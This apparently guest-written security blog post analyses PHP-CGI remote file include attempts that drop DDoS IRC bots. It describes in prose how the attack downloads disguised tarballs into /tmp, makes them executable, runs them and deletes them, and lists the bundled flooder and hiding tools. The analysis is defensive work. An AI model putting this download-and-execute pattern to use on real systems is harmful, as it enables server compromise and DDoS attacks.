This post was contributed by my good friend and all around good guy, @hkmalwares.
In the last couple weeks I saw some interesting PHP CGI remote file include attempts that contained a few DDOS IRC bots. I know these attempts are quite common in the wild but this one stood out as it downloaded two different IRC bots. In this post i’m going to share my encounter in what I thought was interesting and do a basic breakdown.
The IDS Rule that brought this to my attention was SERVER-WEBAPP PHP-CGI Remote file include attempt SID 22063.
Basically, what it’s doing is changing directories to /tmp, wgets seed.jpg, untars it, grants file execution permissions on seed.jpg, runs it, and then deletes itself.
Let go ahead and try to simply cat seed.jpg
The tar contains a bash script that pulls down two payloads. First lets dig into ddosperl.jpg. When untar’d it spits out libssl3.so.2 into /var/temp. So what is libssl3.so.2? DDOS Perl IRC bot v1.0. A quick Google search revealed a [pastebin] containing the perl script.
The next payload observed is little bit more interesting. Going back to the second payload defined in seeds.jpg we see another wget for flbotbsd.jpg. Again it’s a tar and it extracts a hidden directory “.d” followed by removing flbotbsd.jpg and executing ./autorun.
After performing a quick Google searches I came across others who have encountered this bot before. Caffsec is calling it FlooderIRCBot.
A [pastebin] posted back in April contains a description of most of the files seen within “.d”. Looks like this bot contains a variety of flooder options.
However on my example I see some tools missing and some tools that have been added such as ZmEu v0.2 , XHide – Process Faker and ZAP. As for AV detection’s, a lot of these hack tools have been around for a while so the detection ratios were quite high.
I think this is a good place to stop as this post is getting to long and was only meant to be a basic dive.